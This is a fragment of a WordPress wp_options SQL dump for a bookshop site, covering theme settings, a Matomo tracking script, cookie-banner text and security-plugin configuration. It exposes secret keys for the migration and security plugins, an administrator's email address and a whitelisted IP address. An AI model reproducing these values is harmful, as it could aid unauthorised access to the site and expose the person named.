";s:2:\"mt\";s:0:\"\";s:2:\"mb\";s:0:\"\";}s:9:\"wtitle_bg\";s:0:\"\";s:11:\"wtitle_font\";s:0:\"\";s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;s:13:\"show_comments\";i:0;s:9:\"show_tags\";i:0;s:14:\"wtitle_nostyle\";i:0;}i:6;a:0:{}}','yes'),(215,'widget_maghoot-posts-list-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(216,'widget_hoot-social-icons-widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(227,'wpmdr_from_','a:2:{s:4:\"home\";s:1:\"1\";s:11:\"help_notice\";s:1:\"1\";}','yes'),(228,'wpmdr_css','.entry-meta {display:none !important;}\r\n	.home .entry-meta { display: none; }\r\n	.entry-footer {display:none !important;}\r\n	.home .entry-footer { display: none; }','yes'),(229,'wpmdr_disable_php','0','yes'),(230,'wpmdr_disable_css','0','yes'),(231,'wpmdr_individual_post','0','yes'),(232,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','yes'),(248,'shfs_insert_header','','yes'),(249,'shfs_insert_footer','<!-- Matomo -->\r\n<script type=\"text/javascript\">\r\n  var _paq = _paq || [];\r\n  /* tracker methods like \"setCustomDimension\" should be called before \"trackPageView\" */\r\n  _paq.push([\"setDocumentTitle\", document.domain + \"/\" + document.title]);\r\n  _paq.push([\"setCookieDomain\", \"*.ashbooks.co.uk\"]);\r\n  _paq.push([\"setDomains\", [\"*.ashbooks.co.uk\"]]);\r\n  _paq.push([\'trackPageView\']);\r\n  _paq.push([\'enableLinkTracking\']);\r\n  (function() {\r\n    var u=\"//whychurch.org.uk/piwik/\";\r\n    _paq.push([\'setTrackerUrl\', u+\'piwik.php\']);\r\n    _paq.push([\'setSiteId\', \'68\']);\r\n    var d=document, g=d.createElement(\'script\'), s=d.getElementsByTagName(\'script\')[0];\r\n    g.type=\'text/javascript\'; g.async=true; g.defer=true; g.src=u+\'piwik.js\'; s.parentNode.insertBefore(g,s);\r\n  })();\r\n</script>\r\n<noscript><p><img src=\"//whychurch.org.uk/piwik/piwik.php?idsite=68&rec=1\" style=\"border:0;\" alt=\"\" /></p></noscript>\r\n<!-- End Matomo Code -->','yes'),(302,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:32:\"amber.platts@vanillacircus.co.uk\";s:7:\"version\";s:5:\"5.8.2\";s:9:\"timestamp\";i:1636580335;}','no'),(2424,'akismet_spam_count','366','yes'),(50056,'category_children','a:0:{}','yes'),(75215,'wpo_update_version','3.0.16','yes'),(75216,'updraft_task_manager_dbversion','1.1','yes'),(75221,'wpo_cache_config','a:15:{s:19:\"enable_page_caching\";b:0;s:23:\"page_cache_length_value\";i:24;s:22:\"page_cache_length_unit\";s:5:\"hours\";s:17:\"page_cache_length\";i:86400;s:20:\"cache_exception_urls\";a:0:{}s:23:\"cache_exception_cookies\";a:0:{}s:30:\"cache_exception_browser_agents\";a:0:{}s:22:\"enable_sitemap_preload\";b:0;s:23:\"enable_schedule_preload\";b:0;s:21:\"preload_schedule_type\";s:0:\"\";s:21:\"enable_mobile_caching\";b:0;s:19:\"enable_user_caching\";b:0;s:8:\"site_url\";s:23:\"https://ashbooks.co.uk/\";s:17:\"wpo_cache_cookies\";a:0:{}s:25:\"wpo_cache_query_variables\";a:0:{}}','yes'),(75222,'CookieLawInfo-0.9','a:78:{s:18:\"animate_speed_hide\";s:3:\"500\";s:18:\"animate_speed_show\";s:3:\"500\";s:10:\"background\";s:4:\"#FFF\";s:14:\"background_url\";s:0:\"\";s:6:\"border\";s:9:\"#b1a6a6c2\";s:9:\"border_on\";b:1;s:9:\"bar_style\";s:5:\"Array\";s:13:\"button_1_text\";s:6:\"ACCEPT\";s:12:\"button_1_url\";s:1:\"#\";s:15:\"button_1_action\";s:27:\"#cookie_action_close_header\";s:20:\"button_1_link_colour\";s:4:\"#fff\";s:16:\"button_1_new_win\";b:0;s:18:\"button_1_as_button\";b:1;s:22:\"button_1_button_colour\";s:4:\"#000\";s:20:\"button_1_button_size\";s:6:\"medium\";s:14:\"button_1_style\";s:5:\"Array\";s:13:\"button_2_text\";s:9:\"Read More\";s:12:\"button_2_url\";s:22:\"https://ashbooks.co.uk\";s:15:\"button_2_action\";s:17:\"CONSTANT_OPEN_URL\";s:20:\"button_2_link_colour\";s:4:\"#444\";s:16:\"button_2_new_win\";b:1;s:18:\"button_2_as_button\";b:0;s:22:\"button_2_button_colour\";s:4:\"#333\";s:20:\"button_2_button_size\";s:6:\"medium\";s:17:\"button_2_url_type\";s:3:\"url\";s:13:\"button_2_page\";s:1:\"0\";s:16:\"button_2_hidebar\";b:0;s:14:\"button_2_style\";s:5:\"Array\";s:13:\"button_3_text\";s:6:\"Reject\";s:12:\"button_3_url\";s:1:\"#\";s:15:\"button_3_action\";s:34:\"#cookie_action_close_header_reject\";s:20:\"button_3_link_colour\";s:4:\"#fff\";s:16:\"button_3_new_win\";b:0;s:18:\"button_3_as_button\";b:1;s:22:\"button_3_button_colour\";s:4:\"#000\";s:20:\"button_3_button_size\";s:6:\"medium\";s:14:\"button_3_style\";s:5:\"Array\";s:13:\"button_4_text\";s:15:\"Cookie settings\";s:12:\"button_4_url\";s:1:\"#\";s:15:\"button_4_action\";s:23:\"#cookie_action_settings\";s:20:\"button_4_link_colour\";s:7:\"#62a329\";s:16:\"button_4_new_win\";b:0;s:18:\"button_4_as_button\";b:0;s:22:\"button_4_button_colour\";s:4:\"#000\";s:20:\"button_4_button_size\";s:6:\"medium\";s:14:\"button_4_style\";s:5:\"Array\";s:11:\"font_family\";s:7:\"inherit\";s:10:\"header_fix\";b:0;s:5:\"is_on\";b:1;s:8:\"is_eu_on\";b:0;s:10:\"logging_on\";b:0;s:19:\"notify_animate_hide\";b:1;s:19:\"notify_animate_show\";b:0;s:13:\"notify_div_id\";s:20:\"#cookie-law-info-bar\";s:26:\"notify_position_horizontal\";s:5:\"right\";s:24:\"notify_position_vertical\";s:6:\"bottom\";s:14:\"notify_message\";s:199:\"This website uses cookies to improve your experience. We\\\'ll assume you\\\'re ok with this, but you can opt-out if you wish. [cookie_settings margin=\\\"5px 20px 5px 20px\\\"][cookie_button margin=\\\"5px\\\"]\";s:12:\"scroll_close\";b:0;s:19:\"scroll_close_reload\";b:0;s:19:\"accept_close_reload\";b:0;s:19:\"reject_close_reload\";b:0;s:20:\"showagain_background\";s:4:\"#fff\";s:16:\"showagain_border\";s:4:\"#000\";s:14:\"showagain_text\";s:24:\"Privacy & Cookies Policy\";s:16:\"showagain_div_id\";s:22:\"#cookie-law-info-again\";s:13:\"showagain_tab\";b:1;s:20:\"showagain_x_position\";s:5:\"100px\";s:4:\"text\";s:4:\"#000\";s:17:\"use_colour_picker\";b:1;s:12:\"show_once_yn\";b:0;s:9:\"show_once\";s:5:\"10000\";s:9:\"is_GMT_on\";b:1;s:8:\"as_popup\";b:0;s:13:\"popup_overlay\";b:1;s:16:\"bar_heading_text\";s:0:\"\";s:13:\"cookie_bar_as\";s:6:\"banner\";s:24:\"popup_showagain_position\";s:12:\"bottom-right\";s:15:\"widget_position\";s:4:\"left\";}','yes'),(75223,'cookielawinfo_privacy_overview_content_settings','a:2:{s:24:\"privacy_overview_content\";s:571:\"This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.\";s:22:\"privacy_overview_title\";s:16:\"Privacy Overview\";}','yes'),(75224,'cookielawinfo_necessary_settings','a:1:{s:21:\"necessary_description\";s:242:\"Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.\";}','yes'),(75225,'cookielawinfo_thirdparty_settings','a:5:{s:19:\"thirdparty_on_field\";b:1;s:25:\"third_party_default_state\";b:1;s:22:\"thirdparty_description\";s:302:\"Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.\";s:23:\"thirdparty_head_section\";s:0:\"\";s:23:\"thirdparty_body_section\";s:0:\"\";}','yes'),(76783,'wp-optimize-install-or-update-notice-version','1.0','yes'),(97148,'active_plugins1','a:12:{i:0;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:1;s:37:\"wp-hide-security-enhancer/wp-hide.php\";i:2;s:19:\"akismet/akismet.php\";i:3;s:36:\"contact-form-7/wp-contact-form-7.php\";i:4;s:35:\"cookie-law-info/cookie-law-info.php\";i:5;s:34:\"header-and-footer-scripts/shfs.php\";i:6;s:27:\"js_composer/js_composer.php\";i:7;s:41:\"post-type-switcher/post-type-switcher.php\";i:8;s:47:\"quick-featured-images/quick-featured-images.php\";i:9;s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";i:10;s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";i:11;s:27:\"wp-optimize/wp-optimize.php\";}','yes'),(97149,'ai1wm_secret_key','giMlGwJ6PhdF','yes'),(97150,'ai1wm_backups_labels','a:0:{}','yes'),(97151,'ai1wm_sites_links','a:0:{}','yes'),(97153,'ai1wm_status','a:3:{s:4:\"type\";s:4:\"done\";s:5:\"title\";s:41:\"Your site has been imported successfully!\";s:7:\"message\";s:375:\"» <a class=\"ai1wm-no-underline\" href=\"https://ashbooks.co.uk/wp-admin/options-permalink.php#submit\" target=\"_blank\">Save permalinks structure</a>. (opens a new window)<br />» <a class=\"ai1wm-no-underline\" href=\"https://wordpress.org/support/view/plugin-reviews/all-in-one-wp-migration?rate=5#postform\" target=\"_blank\">Optionally, review the plugin</a>. (opens a new window)\";}','yes'),(97154,'template','magazine-hoot','yes'),(97156,'stylesheet','magazine-hoot','yes'),(97158,'jetpack_active_modules','a:0:{}','yes'),(97164,'wp_page_for_privacy_policy','0','yes'),(97165,'show_comments_cookies_opt_in','1','yes'),(97166,'admin_email_lifespan','1624616190','yes'),(97167,'disallowed_keys','','no'),(97168,'comment_previously_approved','','yes'),(97169,'auto_plugin_theme_update_emails','a:0:{}','no'),(97170,'finished_updating_comment_type','1','yes'),(97171,'db_upgraded','','yes'),(97178,'ai1wm_updater','a:0:{}','yes'),(97179,'recovery_keys','a:0:{}','yes'),(97313,'_transient_health-check-site-status-result','{\"good\":14,\"recommended\":5,\"critical\":0}','yes'),(123556,'wfls_last_role_change','1624356962','no'),(123557,'wordfence_version','7.5.4','yes'),(123558,'wordfence_case','1','yes'),(123559,'wordfence_installed','1','yes'),(123560,'wordfenceActivated','0','yes'),(123561,'active_plugins','a:2:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:2;s:23:\"wp-cerber/wp-cerber.php\";}','yes'),(123562,'wf_plugin_act_error','','yes'),(123737,'wordfence_syncAttackDataAttempts','0','no'),(123738,'wordfence_syncingAttackData','0','no'),(123739,'wordfence_lastSyncAttackData','1629499513','no'),(123837,'auto_update_core_dev','enabled','yes'),(123838,'auto_update_core_minor','enabled','yes'),(123839,'auto_update_core_major','unset','yes'),(123841,'https_detection_errors','a:0:{}','yes'),(123846,'can_compress_scripts','0','no'),(123854,'aiowpsec_db_version','1.9','yes'),(123855,'aio_wp_security_configs','a:92:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:1:\"1\";s:25:\"aiowps_max_login_attempts\";i:3;s:24:\"aiowps_retry_time_period\";i:5;s:26:\"aiowps_lockout_time_length\";i:60;s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"6vmn59meiq74690m3be1\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:1:\"1\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"185.175.113.72\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"8u908ymyqgtlrck2zlt2\";s:42:\"aiowps_enable_manual_registration_approval\";s:1:\"1\";s:39:\"aiowps_enable_registration_page_captcha\";s:1:\"1\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(123982,'_cerber_db_errors','a:8:{i:0;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624620828.142046;}i:1;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624620828.161296;}i:2;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624620828.16141;}i:3;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624620828.161518;}i:4;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624620828.161562;}i:5;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624620828.161599;}i:6;a:3:{i:0;s:49:\"Table \'ashbookscouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624620828.161634;}i:7;a:3:{i:0;s:41:\"Duplicate entry \'95.32.7.88\' for key \'ip\'\";i:1;s:133:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"95.32.7.88\",1627538803,\"Limit on login attempts is reached\",701)\";i:2;d:1627535203.968367;}}','no'),(123997,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.8.5\";s:1:\"t\";i:1624620832;}','no'),(123998,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.8.5</h1><ul><li>New: Quick user activity analytics (user insights) with filtering links on the Activity and Live Traffic log pages. Select a user to see how it works.</li><li>New: Quick IP address activity and analytics (IP insights) with filtering links on the Activity and Live Traffic log pages. Select an IP address to see how it works.</li><li>Improved: The selected user profile is displayed when filtering log entries by the user login or using the username search on the Activity log page.</li><li>Improved: The IP address details and analytics are displayed when filtering log entries by the IP address or using the IP address search on the Activity log page.</li><li>Improved: Implemented AJAX rendering of the plugin admin pages for faster loading and more convenient navigation through WP Cerber’s admin pages</li><li>Improved: To load the Users admin page faster, the user table columns generated by WP Cerber are now loaded via AJAX.</li><li>Improved: Highlighting the selected filtering link in the navigation bar on the Activity and Live Traffic log pages.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=8.8.5\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/evaluate/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(123999,'cerber-groove','ytZkiaSwDHrzj06l','no'),(124000,'cerber-groove-x','a:2:{i:0;s:32:\"0i2Qt9hBNuGO6pLUjfYvkbF7Xya4mMcZ\";i:1;s:25:\"kW3eosFIh2QKNmltXdbBEqHLy\";}','no'),(124001,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";i:1;s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";i:1;s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";i:1;s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(124002,'cerber-hardening','a:14:{s:8:\"stopenum\";i:1;s:15:\"stopenum_oembed\";i:1;s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";i:1;s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";i:1;s:6:\"norest\";i:0;s:8:\"restauth\";i:1;s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";i:1;}','no'),(124003,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";i:1;s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(124004,'cerber-antispam','a:10:{s:8:\"botscomm\";i:1;s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";i:1;s:10:\"customcomm\";i:0;s:9:\"botswhite\";s:0:\"\";s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(124005,'cerber-recaptcha','a:14:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(124006,'cerber-notifications','a:11:{s:6:\"notify\";i:1;s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no'),(124007,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";i:1;s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(124008,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(124009,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(124010,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(124011,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"01:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(124012,'cerber-policies','a:9:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(124013,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";i:1;s:13:\"master_swshow\";i:1;s:14:\"master_at_site\";i:1;s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(124014,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(124015,'cerber-antibot','a:2:{i:0;a:2:{i:0;a:2:{i:0;s:6:\"LgpSik\";i:1;s:7:\"pHtdka_\";}i:1;a:2:{i:0;s:15:\"iqcBn_LWPlZteTY\";i:1;s:8:\"cYjEQk@d\";}}i:1;a:3:{i:0;a:2:{i:0;s:6:\"_sIpyM\";i:1;s:9:\"YfB24QRUl\";}i:1;a:2:{i:0;s:12:\"DKXqWwgSuzIo\";i:1;s:15:\"Hx7]se32maykfz